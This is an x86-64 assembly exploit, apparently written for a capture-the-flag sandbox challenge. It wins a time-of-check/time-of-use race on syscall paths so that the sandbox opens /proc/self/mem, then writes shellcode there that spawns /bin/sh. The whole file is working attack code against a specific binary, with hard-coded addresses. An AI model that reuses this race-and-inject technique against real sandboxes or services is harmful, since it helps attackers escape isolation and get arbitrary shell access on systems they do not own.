.global _start

#define NUM_SYSCALLS 0x1
#define NUM_ITERS 0x400

_start:

jmp check

pump:
  mov $NUM_SYSCALLS, %rdx
  mov (0x603148), %rdi
  lea -NUM_SYSCALLS(%rsp), %rsi
  mov $1, %eax
  syscall
  ret

start_over:
  lea real_filename(%rip), %rdi
  call copy_str_to_shared_map
  mov %rax, %r13 # real filename

  lea fake_filename(%rip), %rdi
  call copy_str_to_shared_map
  mov %rax, %r14 # fake filename

  mov (0x603158), %r15 # syscall packet

  mov $NUM_ITERS, %r12
race_loop:
  movl $0x27, (%r15) # getpid
  mov %r13, 0x8(%r15) # real_path
  call pump
  mov %r14, 0x8(%r15) # fake_path
  movl $0x50, (%r15) # chdir
  call pump


  mov $(NUM_SYSCALLS*2), %rdx
  lea -(NUM_SYSCALLS*2)(%rsp), %rsi
  mov (0x603130), %rdi
  mov $0, %eax
  syscall

  dec %r12
  jnz race_loop

check:
  lea test_filename(%rip), %rdi
  call copy_str_to_shared_map
  mov %rax, %rsi # test filename
  mov $4, %rdx # R_OK
  mov $21, %rdi # access
  call request_syscall

  test %eax, %eax
  jnz start_over

good:
  mov $3, %rdx
  lea ok(%rip), %rsi
  mov $1, %rdi
  mov $1, %eax
  syscall

getshell:
  lea self_maps(%rip), %rdi
  call copy_str_to_shared_map
  mov %rax, %rsi # test filename
  mov $1, %rdx
  mov $2, %rdi # access
  call request_syscall

  mov $18, %rdi # pwrite64
  mov %rax, %rsi
  lea shellcode(%rip), %rdx
  mov $0x40, %rcx
  mov $0x401639, %r8
  call request_syscall

infloop:
  jmp infloop

shellcode:
  xor %rdx, %rdx
  xor %rsi, %rsi
  lea binsh(%rip), %rdi
  mov $0x3b, %eax
  syscall
binsh:
  .string "/bin/sh"

real_filename:
  .string "/proc"

self_maps:
  .string "self/mem"

fake_filename:
  .string "/p"

test_filename:
  .string "version"

ok:
  .string "ok\n"

copy_str_to_shared_map:
  mov $0x04010A0, %rax
  jmp *%rax

request_syscall:
  mov $0x4010C0, %rax
  jmp *%rax